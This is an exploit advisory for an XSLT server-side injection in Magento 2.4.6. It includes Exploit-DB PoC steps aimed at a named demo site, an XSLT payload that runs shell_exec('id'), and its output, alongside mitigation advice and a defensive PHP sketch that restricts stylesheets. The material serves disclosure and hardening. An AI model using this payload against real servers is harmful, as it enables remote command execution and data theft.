Vendor: Magento
By: tmrswrr
CVSS: 6.1 (HIGH)
Type: XSLT Server Side Injection
CWE: 91
Product Name: Magento
Affected Version From: 2.4.6
Affected Version To: 2.4.6
Patch Exists: NO
Related CWE: TBD
CPE: a:magento:magento:2.4.6
Metasploit:
Other Scripts:
Platforms Tested:
2023

Magento ver. 2.4.6 – XSLT Server Side Injection

An attacker can exploit a vulnerability in Magento version 2.4.6 by injecting a malicious XSLT configuration, which allows execution of arbitrary commands on the server. This can lead to unauthorized access, data theft, and further compromise of the Magento platform. No CVE ID has been assigned yet (CVE-ID: TBD).

Mitigation:

To mitigate this vulnerability, it is recommended to update Magento to the latest patched version and avoid inputting untrusted data into XSLT configurations.
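
The proof of concept on this page depends on the `php:function` extension of PHP's XSL module, which is only reachable when the application has called `XSLTProcessor::registerPHPFunctions()`. The sketch below is an added example, not code from Magento or from the import module: the helper names `loadRestrictedStylesheet` and `transformRestricted` are hypothetical, and it assumes the stylesheet arrives as a string from an admin form.

```php
<?php
declare(strict_types=1);

const XSL_NS     = 'http://www.w3.org/1999/XSL/Transform';
const PHP_XSL_NS = 'http://php.net/xsl'; // namespace the PoC binds to "php:"

/** Hypothetical helper: parse a user-supplied stylesheet, refusing risky constructs. */
function loadRestrictedStylesheet(string $xslt): DOMDocument
{
    libxml_use_internal_errors(true);          // collect parse errors quietly
    $doc = new DOMDocument();
    if (!$doc->loadXML($xslt, LIBXML_NONET)) { // LIBXML_NONET: no network access while parsing
        throw new InvalidArgumentException('Stylesheet is not well-formed XML');
    }
    $xpath = new DOMXPath($doc);
    // Reject any element that has the PHP extension namespace in scope, whatever the prefix.
    if ($xpath->query('//namespace::*[. = "' . PHP_XSL_NS . '"]')->length > 0) {
        throw new InvalidArgumentException('php.net/xsl namespace is not allowed');
    }
    // Keep the stylesheet self-contained so the check above sees everything that is compiled.
    $xpath->registerNamespace('xsl', XSL_NS);
    if ($xpath->query('//xsl:import | //xsl:include')->length > 0) {
        throw new InvalidArgumentException('xsl:import and xsl:include are not allowed');
    }
    return $doc;
}

/** Hypothetical helper: run the transformation with PHP callbacks and I/O disabled. */
function transformRestricted(string $xslt, string $xml): string
{
    $style  = loadRestrictedStylesheet($xslt);
    $source = new DOMDocument();
    if (!$source->loadXML($xml, LIBXML_NONET)) {
        throw new InvalidArgumentException('Input is not well-formed XML');
    }
    $proc = new XSLTProcessor();
    // registerPHPFunctions() is deliberately never called: without it, php:function()
    // cannot reach shell_exec or any other PHP function.
    $proc->setSecurityPrefs(
        XSL_SECPREF_READ_FILE | XSL_SECPREF_WRITE_FILE | XSL_SECPREF_CREATE_DIRECTORY
        | XSL_SECPREF_READ_NETWORK | XSL_SECPREF_WRITE_NETWORK
    );
    $proc->importStylesheet($style);
    $out = $proc->transformToXml($source);
    if (!is_string($out)) {
        throw new RuntimeException('XSLT transformation failed');
    }
    return $out;
}
```

If a transformation genuinely needs PHP callbacks, `registerPHPFunctions()` accepts an explicit list of permitted function names, which is safer than registering everything.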

Exploit-DB raw data:

# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
**Date:** 2023-11-17
**Exploit Author:** tmrswrr
**Vendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
**Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)
**Version:** 2.4.6
**Tested on:** 2.4.6

## POC

1. Log in with admin credentials at this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Set Import Source to File
4. Click `XSLT Configuration` and write this payload:

   ```xml
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','id')" />
     </xsl:template>
   </xsl:stylesheet>
   ```

## RESULT

```
<?xml version="1.0"?>
uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)
```